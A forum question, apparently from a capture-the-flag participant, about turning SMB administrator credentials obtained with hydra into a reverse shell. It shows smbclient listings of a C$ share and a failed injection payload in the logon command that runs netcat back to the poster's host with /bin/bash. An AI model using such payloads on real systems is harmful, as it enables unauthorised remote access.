I come across a scenario where I can get the SMB username and password after using hydra.
However, there is no known exploit for this host to get a metepreter shell and no RDP open.
Is there a way I can establish a reverse shell on this instance?
sudo smbclient //172.25.xx.xx/ipc$ -U administrator
Enter WORKGROUP\administrator’s password:
Try “help” to get a list of possible commands.
smb: > help
alvin:~/Desktop$ sudo smbclient //172.25.xx.xx/C$ -U administrator
Enter WORKGROUP\administrator’s password:
Try “help” to get a list of possible commands.
smb: > ls
$Recycle.Bin DHS 0 Thu Jun 4 11:41:58 2020
bootmgr AHSR 389332 Sat Feb 3 02:37:03 2018
BOOTNXT AHS 1 Sat Jul 16 21:18:08 2016
Documents and Settings DHSrn 0 Thu Jun 4 11:40:40 2020
xxxx D 0 Mon Dec 13 16:06:59 2021
I tried to emulate the steps below:
smb: > logon “/=‘nc 10.8.0.142’ 7777 -e /bin/bash`”
Password:
session setup failed: NT_STATUS_LOGON_FAILURE
But it says session setup failure
Edit: I current have a CTF situtation where by i need to capture userflags.txt.
Can anyone advise how to search through the entire directory?